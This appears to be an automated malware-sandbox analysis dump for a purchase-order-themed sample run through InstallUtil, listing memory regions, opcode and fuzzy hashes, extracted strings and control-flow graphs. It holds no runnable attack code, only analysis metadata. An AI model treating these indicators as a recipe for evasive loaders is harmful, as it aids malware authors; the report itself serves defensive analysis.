                                                          • Instruction ID: 382317e3bdd3fdda92cf212a2d4a8552644e948f29b4ce2d43a3726f204d6e18
                                                          • Opcode Fuzzy Hash: 6879f978427ae0a3a51fd710d502db6edfcc1637e09f2e89ebe1609139f69501
                                                          • Instruction Fuzzy Hash: B7513C71D056588BEB2CCF2B8D446DAFAF3AFC9300F14C1FA944CA6255DBB049858F51
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748642778.0000000005BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5bb0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a2e236004877c9788e6a9f4007cb1dcfd13f864c01ddb4b7b5524a0610f140c4
                                                          • Instruction ID: cc06adf998cc299bc2bea092580ab8662531212be604d0283cf5cade216e1b0a
                                                          • Opcode Fuzzy Hash: a2e236004877c9788e6a9f4007cb1dcfd13f864c01ddb4b7b5524a0610f140c4
                                                          • Instruction Fuzzy Hash: 335161B1D056588BEB6DCF2B8D402DAFAF3AFC9340F04C1FA944CA6265EB7409858F51
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748642778.0000000005BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5bb0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 59b26dd4681282105a26a460fe661e01068d4de105767132f27642bf6fd6afdb
                                                          • Instruction ID: e9ae567d25f1646b103bbd5d181d907443d50e9ca14632358964a5a4692d78d9
                                                          • Opcode Fuzzy Hash: 59b26dd4681282105a26a460fe661e01068d4de105767132f27642bf6fd6afdb
                                                          • Instruction Fuzzy Hash: 0341E0B4D003489FEB14CFA9D985BEDBBF1BB09314F209129E419AB250D7B8A845CF85
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3484c2773cbde041e49031b35adf4586d2e447f21dd659d2ec51d49cb7c6b66a
                                                          • Instruction ID: 8a9670bf6bd7620e8c5667dd83619f3d1cd3125d119ad2dc6ec14a80d6411a02
                                                          • Opcode Fuzzy Hash: 3484c2773cbde041e49031b35adf4586d2e447f21dd659d2ec51d49cb7c6b66a
                                                          • Instruction Fuzzy Hash: 8441C271D04A588BEB1DDF6B8C4028AFBF3AFC5301F48C1BA8858AB265EB344542CF01
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 190dac3731eb180fc9bc691885160e2e18fe6ebebe241fc772bc14538f543cec
                                                          • Instruction ID: dbc9e19d05ff9d68cf49c1afce16bdbe116bc55cd8727564ea8b3ff53f8ca7dd
                                                          • Opcode Fuzzy Hash: 190dac3731eb180fc9bc691885160e2e18fe6ebebe241fc772bc14538f543cec
                                                          • Instruction Fuzzy Hash: 64415670D05248CFDB08DFA8D18A7EDBFB2FB89310F9490AAE449A7294D7785945CF02
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748032705.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59e0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 16f0e021a5f1f81b56d6d904428d5bb62ce4ae5235829dd0c02b5bac3988091f
                                                          • Instruction ID: 46455001ab567de0fc49d1f3ec5934009926adba56459e42b729b25351590d40
                                                          • Opcode Fuzzy Hash: 16f0e021a5f1f81b56d6d904428d5bb62ce4ae5235829dd0c02b5bac3988091f
                                                          • Instruction Fuzzy Hash: EC41D775E056588BEB29CF6AC8846DDBBF2ABC9310F14C0A6D40DAB354DB345A85CF40
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748463440.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e85f18ced04681d5c935c7124c2fe764565941233a2d5c6ef38f340725a1d6e2
                                                          • Instruction ID: 5d8c4072637b094bdf7011426112d6cd6a6f4cd1b48c30ea4cea1c425fa442bf
                                                          • Opcode Fuzzy Hash: e85f18ced04681d5c935c7124c2fe764565941233a2d5c6ef38f340725a1d6e2
                                                          • Instruction Fuzzy Hash: C041FEB5D052589FCB10CFA9D481AEEFBF4EB49310F24946AE415B7340C738AA45DF64
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d6c6dc8b4e845f032bd05a6954f296ecbb52ecd0c9ef3484f831d4ed631131d9
                                                          • Instruction ID: 85d6a7e1f064eb95954cf2cf532e2cbba59ae34e46971025602ebe983def3a6d
                                                          • Opcode Fuzzy Hash: d6c6dc8b4e845f032bd05a6954f296ecbb52ecd0c9ef3484f831d4ed631131d9
                                                          • Instruction Fuzzy Hash: F5415071E04A588BEB1CCF6B8C4469AFAF3AFC9301F14C1B9980CAB265EB3055468F01
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8eb24ad9d77aeb7d5f16f625b6e048fcc62c7c6f0aa37fea6d9ea030cf98e6ef
                                                          • Instruction ID: eb91684b7a8d6b2f9c4db39e9cdd7480b137f1f5f3a0bb0e3763255e164995bd
                                                          • Opcode Fuzzy Hash: 8eb24ad9d77aeb7d5f16f625b6e048fcc62c7c6f0aa37fea6d9ea030cf98e6ef
                                                          • Instruction Fuzzy Hash: FC41E571E05618CBEB18CFAAD9447DDFBF6BF89300F14C0AAD40AA7254EB7449858F51
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748032705.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59e0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4491ac94f4d1f2d9e2d421ae0b79b244ce3a02786e736b27ab456b1bf1a6560f
                                                          • Instruction ID: 60282d679408d759ea1dde98579bcd760b0bd8067fdad56737c05eb7fca6eb08
                                                          • Opcode Fuzzy Hash: 4491ac94f4d1f2d9e2d421ae0b79b244ce3a02786e736b27ab456b1bf1a6560f
                                                          • Instruction Fuzzy Hash: C041C775E05658CBEB59CF6AC8846DDBBF2ABC9310F14C0AAD40DAB354DB345A85CF40
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748463440.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6f87ccd8833cb11160debf76d5318f69bba9aa5e90e90f7b0b76a99702e638ae
                                                          • Instruction ID: af250b8181f2c74f502435d729a75bed4208f5dd6354615ce882e6b880afc80f
                                                          • Opcode Fuzzy Hash: 6f87ccd8833cb11160debf76d5318f69bba9aa5e90e90f7b0b76a99702e638ae
                                                          • Instruction Fuzzy Hash: 8041EEB5D04258DFCB10CFA9D480AEEFBF4AB49310F24946AE415B7240C778AA45DFA4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748463440.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cb81fd01a9770d3fe427eff2259a5589a1a6982f69c645463661edfd65d768fe
                                                          • Instruction ID: 37dcd9e3de71e9a1c6bd7afac058849f344da3ba3ef411c62fb0e71b8d337692
                                                          • Opcode Fuzzy Hash: cb81fd01a9770d3fe427eff2259a5589a1a6982f69c645463661edfd65d768fe
                                                          • Instruction Fuzzy Hash: A83167B6D042489FDF11CFA4D4806EDBBF1AF09320F14949AE454B7291D7389A86DFA4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748974376.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e30000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 33e26c6e8f1fcfd190fc3ab6c0e6d1397969b0137d34d3726b7cee2f8a801b57
                                                          • Instruction ID: 35351534f777401c6c218b836bd0a0b71d5d3d8ea6ad76f634ed157436014e97
                                                          • Opcode Fuzzy Hash: 33e26c6e8f1fcfd190fc3ab6c0e6d1397969b0137d34d3726b7cee2f8a801b57
                                                          • Instruction Fuzzy Hash: 5E315E71D057559FDB1ACF6ACC5828ABBB2AF85300F09C0FAC488DB252EB744985DF11
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748463440.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ac5f29849b675becf6784a42410333adedceec2ac2d309adfc48e7d46d0ba82b
                                                          • Instruction ID: 6f8bbd2fa85c7537d9826f729bcc9306cfb441fd255802f0f87a825c28b4a72e
                                                          • Opcode Fuzzy Hash: ac5f29849b675becf6784a42410333adedceec2ac2d309adfc48e7d46d0ba82b
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748974376.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e30000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (bq$4'^q$4'^q$4'^q$4'^q$pbq
                                                          • API String ID: 0-723292480

                                                          Execution Graph

                                                          Execution Coverage:10.6%
                                                          Dynamic/Decrypted Code Coverage:100%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:20
                                                          Total number of Limit Nodes:5
                                                          execution_graph 26250 1560848 26251 156084e 26250->26251 26252 156091b 26251->26252 26254 1561340 26251->26254 26256 1561283 26254->26256 26257 156134b 26254->26257 26255 1561448 26255->26251 26256->26251 26257->26255 26259 1567059 26257->26259 26261 1567063 26259->26261 26260 1567119 26260->26257 26261->26260 26264 682ce88 26261->26264 26269 682ce78 26261->26269 26266 682ce9d 26264->26266 26265 682d0b2 26265->26260 26266->26265 26267 682d730 GlobalMemoryStatusEx 26266->26267 26268 682d4d0 GlobalMemoryStatusEx 26266->26268 26267->26266 26268->26266 26270 682ce9d 26269->26270 26271 682d0b2 26270->26271 26272 682d730 GlobalMemoryStatusEx 26270->26272 26273 682d4d0 GlobalMemoryStatusEx 26270->26273 26271->26260 26272->26270 26273->26270

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 2124 1566ea1-1566f0a call 1566c08 2133 1566f26-1566f55 2124->2133 2134 1566f0c-1566f25 call 1566724 2124->2134 2140 1566f57-1566f5a 2133->2140 2141 1566f5c-1566f70 2140->2141 2142 1566f8d-1566f90 2140->2142 2150 1566f76 2141->2150 2151 1566f72-1566f74 2141->2151 2143 1566fa4-1566fa7 2142->2143 2144 1566f92-1566f99 2142->2144 2148 1566fe3-1566fe6 2143->2148 2149 1566fa9-1566fde 2143->2149 2146 1566f9f 2144->2146 2147 1567168-156716f 2144->2147 2146->2143 2152 1566ff6-1566ff8 2148->2152 2153 1566fe8 call 1567988 2148->2153 2149->2148 2156 1566f79-1566f88 2150->2156 2151->2156 2154 1566fff-1567002 2152->2154 2155 1566ffa 2152->2155 2158 1566fee-1566ff1 2153->2158 2154->2140 2157 1567008-1567017 2154->2157 2155->2154 2156->2142 2161 1567041-1567056 2157->2161 2162 1567019-156701c 2157->2162 2158->2152 2161->2147 2164 1567024-156703f 2162->2164 2164->2161 2164->2162
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1853242978.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1560000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LR^q$LR^q
                                                          • API String ID: 0-4089051495

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 2781 682e09f-682e0ab 2782 682e0d5-682e0e8 2781->2782 2783 682e0ad-682e0d4 call 682d4c0 2781->2783 2787 682e0eb-682e0f4 call 682d808 2782->2787 2790 682e0f6-682e0f9 2787->2790 2791 682e0fa-682e138 2787->2791 2791->2787 2796 682e13a-682e159 2791->2796 2799 682e15b-682e15e 2796->2799 2800 682e15f-682e1ec GlobalMemoryStatusEx 2796->2800 2803 682e1f5-682e21d 2800->2803 2804 682e1ee-682e1f4 2800->2804 2804->2803

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 2807 682e178-682e1b6 2808 682e1be-682e1ec GlobalMemoryStatusEx 2807->2808 2809 682e1f5-682e21d 2808->2809 2810 682e1ee-682e1f4 2808->2810 2810->2809
                                                          APIs
                                                          • GlobalMemoryStatusEx.KERNELBASE(8B55058C), ref: 0682E1DF
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1865099101.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_6820000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID: GlobalMemoryStatus
                                                          • String ID:
                                                          • API String ID: 1890195054-0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1853242978.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1560000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: PH^q
                                                          • API String ID: 0-2549759414
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1853242978.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1560000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LR^q
                                                          • API String ID: 0-2625958711
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1853242978.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1560000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LR^q
                                                          • API String ID: 0-2625958711
                                                          • Opcode ID: 0dc796667ac536b702a435ee4baa2cc19432c7d0b39c5b1997c35626442afcfd
                                                          • Instruction ID: 0c6f882df0dfca9855d424365b3351209ca9773a2ca4e58bdc6607dcfac79c5e
                                                          • Opcode Fuzzy Hash: 0dc796667ac536b702a435ee4baa2cc19432c7d0b39c5b1997c35626442afcfd
                                                          • Instruction Fuzzy Hash: 3E21E1B1A042124FD719EB7DE4943AE7BA6FF96704F1048AEC005CB255EE39CC85C796
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1853242978.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1560000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5776754768f9fc438bdb4da7abf267dbbe3b218e65a93373a1cd60a83e9e8f62
                                                          • Instruction ID: f703867a95c92ff00a401ae4d2233069a147d60c03d61855fef4f8eb809a4969
                                                          • Opcode Fuzzy Hash: 5776754768f9fc438bdb4da7abf267dbbe3b218e65a93373a1cd60a83e9e8f62
                                                          • Instruction Fuzzy Hash: 85128374701102CFCB6AAB3CE48422C77A6FB99748F208A7DE405CB365DE75DC469792
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1853242978.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1560000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d2b9f7f677c6920b399936df2c344767021de13d7472a8e1a4715bf0b5d87019
                                                          • Instruction ID: 510e8d97225dba83c4798a2302ddae8edb350725057a269a27588a5b58511f56
                                                          • Opcode Fuzzy Hash: d2b9f7f677c6920b399936df2c344767021de13d7472a8e1a4715bf0b5d87019
                                                          • Instruction Fuzzy Hash: 62D19C74B002058FDB15DF68D484AADBBB6FF89314F24856AE806DB391DB34EC42CB91
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1853242978.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1560000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a06b07b2d886641b45c4e5fc6dd124115f356540417d7c9dab03ffc2bdee76e4
                                                          • Instruction ID: fd1fe3d0211c55698d3a645e9cac4cc273031e3cbe595f68fc0f97b53d31f798
                                                          • Opcode Fuzzy Hash: a06b07b2d886641b45c4e5fc6dd124115f356540417d7c9dab03ffc2bdee76e4
                                                          • Instruction Fuzzy Hash: 47C19B75B002058FDB14CF69D8807AEBBBAFB88314F24856AE909DF395DB74D841CB91
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1853242978.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1560000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cb9b7749e04f28c0bc12712bf807508405a6e6574a8d9de4be9fbe40baf57431
                                                          • Instruction ID: 8918626d473d44931ac2c061b6c9e7896cc6fd4d2629e4d7dbf6930c846b257b
                                                          • Opcode Fuzzy Hash: cb9b7749e04f28c0bc12712bf807508405a6e6574a8d9de4be9fbe40baf57431
                                                          • Instruction Fuzzy Hash: 35B14C70E00209CFDF14CFA9D99179EBBF6BF58314F148529E815AB354EB749885CB81
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1853242978.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1560000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 67e9a86d09ab91eca1db0b29cc600ad85e091a0192c3f6228dda1d53b6a3fbde
                                                          • Instruction ID: a0fe40c8e56d32ee0af6a87efb3b30c6511f52940ce1a9f91c554645a3e4a1bf
                                                          • Opcode Fuzzy Hash: 67e9a86d09ab91eca1db0b29cc600ad85e091a0192c3f6228dda1d53b6a3fbde
                                                          • Instruction Fuzzy Hash: E9917C70E00209DFDF50CFA9C9857EDBBF6BF98314F148129E419AB294EB749885CB91
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1853242978.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1560000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6039655967febc53f06309e2f92808387e2388513c4a979db684de7d692fc0b1
                                                          • Instruction ID: a1a99165022f817ba769e632c97f11c0313fa3b3af04cd6638d761155740f0b9
                                                          • Opcode Fuzzy Hash: 6039655967febc53f06309e2f92808387e2388513c4a979db684de7d692fc0b1
                                                          • Instruction Fuzzy Hash: 9351F2B0D102188FDB18CFA9C884B9EBBF5BF48714F14811AE819AB351D774A845CF95
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1853242978.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1560000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 83323a466f1116ba21ec281d7614b39444c2a59e844c1b8eae5dcc5cdd32b09b
                                                          • Instruction ID: 0c1f212bf77f01f6d238e37a0c040c5675eb2630f9d5d50ddba81d18fb683632
                                                          • Opcode Fuzzy Hash: 83323a466f1116ba21ec281d7614b39444c2a59e844c1b8eae5dcc5cdd32b09b
                                                          • Instruction Fuzzy Hash: 155103B0D10218CFDB18CFA9C884B9EBBF5BF48714F14851AE819AB351DB74A845CF95
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1853242978.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1560000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 695629c3c6478c2c9612c6a3ad39520c9743cf1f76e03632a14fa836bce5cf58
                                                          • Instruction ID: 08d9a52cd53c54532d62123102957f046b0833e1905158f99ec5c5fc84badc12
                                                          • Opcode Fuzzy Hash: 695629c3c6478c2c9612c6a3ad39520c9743cf1f76e03632a14fa836bce5cf58
                                                          • Instruction Fuzzy Hash: DA514970B07281CFCB4ADB2CF8D85987F71EB9630474955EAD0405B636DA382D4ADBA3
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1853242978.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1560000_InstallUtil.jbxd
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1852227826.00000000014CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014CD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_14cd000_InstallUtil.jbxd
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1852315567.00000000014DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014DD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_14dd000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cd5805d790f208eb91285b78fc2010320af5414b80947b15b2425f18a1027f16
                                                          • Instruction ID: 8fe1f458617c5fe07ac17aa00731054de57ac779fa0f45f07bcd9d14176d1f9f
                                                          • Opcode Fuzzy Hash: cd5805d790f208eb91285b78fc2010320af5414b80947b15b2425f18a1027f16
                                                          • Instruction Fuzzy Hash: D62103B1904200DFCF16DF58D9D0B26BB65EBC4358F24C56ED90A4B3A6C336D407CA61
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1853242978.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1560000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 905616f17822cc1fb83fab2cf2a12e8d175b2a37a097c510d4e26f2bd5e026b3
                                                          • Instruction ID: 527cf97e4ac2f27c2dfeb73b799d880a44193fbb3bfa84c84806ad409541bb16
                                                          • Opcode Fuzzy Hash: 905616f17822cc1fb83fab2cf2a12e8d175b2a37a097c510d4e26f2bd5e026b3
                                                          • Instruction Fuzzy Hash: B421A431E00606DFDB19CFA4D49499EB7B6BF89314F10852AE815FB391DB709846CB91
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1853242978.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1560000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: db2775e45b0a52ba486733fab25b4ce7273676c1dd65de97d7e948a6ff0aa2fe
                                                          • Instruction ID: 3e618c8b646bf93a35b3c8527d8866f13a3cafaf3ebd1d5cfa001f71a83f0bda
                                                          • Opcode Fuzzy Hash: db2775e45b0a52ba486733fab25b4ce7273676c1dd65de97d7e948a6ff0aa2fe
                                                          • Instruction Fuzzy Hash: 1D219231E0060ADFCB19CFA9D45499EB7B6BF89304F10861AE815FB381DB709846CB90
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1853242978.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1560000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ed5999df989c6c70b132aababf1a525f95ebffaa8294cc842ece49b02a073ab2
                                                          • Instruction ID: 319a59dd953ca21b583c13c32d76916f9eaf013aa66c6a78121259257bf42a50
                                                          • Opcode Fuzzy Hash: ed5999df989c6c70b132aababf1a525f95ebffaa8294cc842ece49b02a073ab2
                                                          • Instruction Fuzzy Hash: 91210930B00605CFDB54EB79C5956AE77FABB89245F204468D106EF3A0EB369D41CBE1
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1853242978.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1560000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6830b1eb37781cf2a16ab6b95f761f6538323ccae9ebb41f4a6132fe3848e321
                                                          • Instruction ID: c1d8932328995d84c75bd1d23ac9673538b8486e1d94e1add223bbf6bf37b103
                                                          • Opcode Fuzzy Hash: 6830b1eb37781cf2a16ab6b95f761f6538323ccae9ebb41f4a6132fe3848e321
                                                          • Instruction Fuzzy Hash: 2E212730B00605CFDB55EF38C5946AE77FABF89201F2044A8D105EB2A0EB369D41CBA5
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1853242978.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1560000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 25c6f62bd3e9d51d6df266463c8eb62acb1eb89a6e13e415817658ebd93413eb
                                                          • Instruction ID: 6244199d9d3a6a923130a677d37e86ec46cd49cb023954700d8b7a53e620b5c5
